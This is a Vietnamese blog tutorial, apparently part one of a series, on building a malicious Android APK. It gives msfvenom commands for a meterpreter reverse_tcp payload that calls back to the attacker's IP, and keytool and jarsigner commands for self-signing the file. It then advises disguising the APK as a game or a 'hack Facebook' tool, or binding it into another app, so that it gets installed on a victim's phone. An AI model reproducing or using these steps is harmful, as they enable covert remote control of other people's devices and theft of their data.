Hướng Dẫn Thử Hack Điện Thoại Android

 

:

 

Đầu tiên, các bạn cần Khởi động Kali linux, chi tiết về kali cũng như cách cài đặt máy ảo VMware, cài đặt KALI bạn có thể tham khảo các link ở đầu bài viết. :d

Lưu ý, nếu bạn đang chạy Kali trên máy ảo VMware thì cần đảm bảo rằng chế độ card mạng đang là Bridged (mục đích để kali nhận địa chỉ IP trực tiếp từ modem, Hình 1 )

Hình 1

Để bắt đầu, bạn cần mở ứng dụng Terminal trên Kali. (hình 2)

Hình 2

Sau đó nhập lệnh để biết thông số IP đang nhận được (hình 3)

Hình 3

Sau khi đã đã đảm bảo IP trên kali và IP trên máy thật của bạn cùng thuộc một đường mạng, ở đây đường mạng của mình là [ 192.168.1.X ] chúng ta sẽ chuyển qua Bước 2

Cũng như trên windows, nếu muốn cài chương trình thì phải sử dụng file *.MSI hoặc file *.exe . File APK trên hệ điều hành Android được sử dụng để cài đặt phần mềm trên hệ thống này.

Nhập lệnh sau để tạo file *.apk, thay [] bằng  địa chỉ IP của bạn, các bạn có thể đặt tên bất kỳ cho file này, trong bài viết này mình sẽ đặt tên cho nó là Hack_test.apk (Hình 3)

msfvenom -p android/meterpreter/reverse_tcp set host=[My IP] -o [Tên file apk].apk

Hình 3

Câu lệnh sẽ tạo ra 1 file Hack_test.apk ở trong Thư mục HOME

 

Các ứng dụng trên Android luôn phải có chữ ký kỹ thuật số trước khi nó được phép triển khai cài đặt trên thiết bị. Không giống như một số nền tảng điện thoại di động khác, bạn không cần phải đi mua giấy chứng nhận kỹ thuật số từ cơ quan cấp chứng nhận ( CA ) để đăng ký các ứng dụng của bạn. Mà thay vào đó, bạn có thể tự tạo ra chứng chỉ tự ký của riêng bản thân và sử dụng nó để đăng ký các ứng dụng Android. Nếu như ko có chữ ký thì bạn hoàn toàn không thể cài đặt file apk trên thiết bị được.

Chúng ta sử dụng cú pháp lệnh như sau để tạo file này:

keytool -genkeypair -v -keystore [Tên file chữ ký].keystore -alias [Tên alias] -keyalg RSA -keysize [option] -validity [option]

Ở đây mình đã thay thế các Option thành câu lệnh cụ thể : Hình 4

keytool -genkeypair -v -keystore my_key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Hình 4

 

Màn hình nhập mật khẩu cho chứng chỉ. Bạn gõ vào bất kỳ mật khẩu nào có nhiều hơn 6 ký tự, rồi nhập thêm 1 lần nữa để xác nhận (Hình 5)

Hình 5

 

Một dãy các câu hỏi được tạo ra, các bạn cứ nhấn enter để bỏ trống (hình 6)

Hình 6

Tại bước xác nhận, bạn nhập Yes để đồng ý, sau đó nhập tiếp thêm 2 lần mật khẩu như trên để kết thúc  (hình 7)

Hình 7

 

Sau khi đã tạo được file chứng chỉ, việc tiếp theo là kí cho file Hack_test.apk

Sử dụng lệnh với cú pháp như sau:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore [Tên file chữ ký] [tên file cần ký]  [tên alias]

Và mình chỉnh sửa lại nó thành (hình 8)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my_key.keystore  Hack_test.apk  alias_name

Hình 8

 

Nhập mật khẩu của file chứng chỉ (hình 9)

Hình 9

 

 

Vậy là chúng ta đã ký thành công cho file apk.

Sau khi ký xong, chúng ta đã có được 1 file apk hoàn chỉnh, việc tiêp theo sẽ là tìm cách cài đặt file này lên điện thoại cần hack.
Để thực hiện việc này có nhiều cách, ví dụ như như đổi tên file này thành tên của một ứng dụng game, hoặc tên một ứng dụng dùng để hack wifi, hack facebook… , hoặc cũng có thể dùng file apk này chèn thẳng vào 1 file apk khác, ví dụ như game flappy bird của Nguyễn Hà Đông chẳng hạn. Tuy đã bị gỡ khỏi googe Play nhưng game này vẫn luôn được người dùng tìm, tải về cài đặt.Và… flappy bird là game bị dính nhiều loại malware, virus, trojan, worm nhất hiện nay…. :))

Qua các bước trên, chúng ta đã tạo được 1 file apk và tiến hành cấp chứng chỉ tạo độ truest cho file này.

Ở bài viết tiếp theo, chúng ta sẽ tìm cách để cài đặt file này lên điện thoại cần hack . Ở đây, thay vì mua một Hostting để update file apk này lên đó, thì mình sẽ dùng kali linux như là một dịch vụ Web Server luôn và lưu trữ tập tin apk này lên đây để thử nghiệm hiệu quả của file này một khi đã xâm nhập được vào hệ thống người dùng,  Hy vọng sẽ được sự đón nhận của các bạn.

Bước tiếp theo, các bạn có thể theo dõi tại :

PHẦN 02 : 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Next Post Previous Post